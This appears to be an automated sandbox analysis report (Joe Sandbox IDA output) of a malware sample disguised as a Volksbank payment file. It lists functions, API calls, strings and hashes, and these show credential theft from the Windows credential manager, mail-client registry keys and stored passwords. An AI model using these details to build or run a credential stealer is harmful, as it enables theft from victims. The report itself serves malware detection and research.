                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                                          • String ID: salu
                                                                                                                                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                                          • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                                          Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                                                                                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                                          Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                                            • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                                          • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                                                                          • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                                          • API String ID: 665470638-2687544566
                                                                                                                                                                                                                                          • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                                                                                          • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                                                                          Function 0040F802 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                                          • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                                                                                          • API String ID: 551151806-1288872324
                                                                                                                                                                                                                                          • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                          • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                                          Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                          • API String ID: 113626815-1670831295
                                                                                                                                                                                                                                          • Opcode ID: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
                                                                                                                                                                                                                                          • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                                                                          Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                                          • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                                          Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                                          Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                                          • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                                          Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                                                                                            • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                                            • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                                            • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                                          • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                                          • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                          • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                                          Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                          • API String ID: 714388716-318151290
                                                                                                                                                                                                                                          • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                                                          • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                                                                          Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                                            • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                                            • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                                            • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1416211542-0
                                                                                                                                                                                                                                          • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                          • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                                                          Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
